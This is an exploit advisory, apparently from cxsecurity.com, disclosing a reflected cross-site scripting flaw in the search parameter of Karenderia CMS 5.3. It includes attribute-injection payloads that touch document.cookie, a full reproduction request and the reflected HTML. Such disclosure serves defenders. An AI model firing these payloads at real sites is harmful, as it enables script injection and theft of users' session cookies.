Karenderia CMS 5.3 Cross Site Scripting

2019.07.09
Credit: Sisyshell
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Karenderia CMS 5.3 - Reflected Cross site scripting # Dork: N/A # Date: 09-07-2019 # Exploit Author: Sisyshell # Vendor Homepage: buyer2@codemywebapps.com # Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694 # Version: v5.3 # Category: Webapps # Tested on: Windows # CVE: N/A Description --------------- Reflected XSS via 's' param at /searcharea?s=" onmouseover="console.log(document.cookie);" Payload: " onmouseover="console.log(document.cookie);" Browser: Firefox 67 Date Observed: 9 July 2019 Reproduction GET ---------------- GET http://bastisapp.com/kmrs/searcharea?s="+onmouseout="alert(1);" HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Cache-Control: no-cache Connection: keep-alive Cookie: PHPSESSID=94kt2rgji1ir1fd1lnlha4m0q0; YII_CSRF_TOKEN=a2a652784b4e1f917ad08aba59a875be88c97873; kr_search_address=%22+onmouseout%3D%22alert%281%29%3B%22; client_location=%7B%22lat%22%3A0%2C%22long%22%3A0%7D DNT: 1 Host: [domain].com Pragma: no-cache Referer: http://[domain].com/kmrs/ Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Reproduction Response --------------------- <div class="col-md-6 col-xs-6 border"> <a href="/kmrs/searcharea?s=" onmouseover="console.log(document.cookie);" &display_type="listview&quot;" class="display-type orange-button block center rounded " data-type="listview"> <i class="fa fa-th-list"></i> </a> <a href="/kmrs/searcharea?s=" onmouseover="console.log(document.cookie);" &display_type="gridview&quot;" class="display-type orange-button block center rounded mr10px inactive" data-type="gridview"> <i class="fa fa-th-large"></i> </a> <a href="javascript:;" id="mobile-filter-handle" class="orange-button block center rounded mr10px"> <i class="fa fa-filter"></i> </a> <a href="javascript:;" id="mobile-viewmap-handle" class="orange-button block center rounded mr10px"> <i class="ion-ios-location"></i> </a> <div class="clear"></div> </div>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top